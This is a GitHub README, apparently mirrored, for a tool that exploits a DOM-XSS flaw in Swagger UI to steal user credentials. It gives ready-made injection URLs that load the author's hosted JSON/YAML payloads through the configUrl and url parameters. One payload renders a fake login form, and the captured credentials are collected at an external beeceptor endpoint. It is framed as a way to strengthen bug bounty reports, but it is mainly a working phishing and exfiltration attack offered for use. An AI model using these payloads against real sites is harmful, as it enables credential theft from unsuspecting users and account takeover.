Giters

M0x0101 / shekoko-main

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Steal Users Credentials via Swagger UI DOM-XSS

Find xss at swagger ui and the triager didn't accept it as there is no cookie?

Use this repo to make fake login form and get user's Credentials

Read this article first https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/ and practice with https://medium.com/@AlQa3Qa3_M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96

Demo

If you found Swagger UI try test xss

    inject this at https://api.redirect.com/swagger/index.html?configUrl=https://m0x0101.github.io/lol/test.json
    or 
    https://api.redirect.com/swagger/index.html?url=https://m0x0101.github.io/lol/test.yaml

For Steal Users Credentials with form

1.  inject this at https://api.redirect.com/swagger/index.html?configUrl=https://m0x0101.github.io/lol/credentials_form.json
    or 
    https://api.redirect.com/swagger/index.html?url=https://m0x0101.github.io/lol/credentials_form.yaml
2.  visit https://app.beeceptor.com/console/alqa3qa3m0x0101

Feedback

If you have any feedback, please reach out to us at m0x0101.ctf@gmail.com

Authors

Resources

https://medium.com/@AlQa3Qa3_M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96

https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/

🔗 Links

linkedin twitter

Buy Me A Coffee

Tech Stack

Client: HTML, JS

About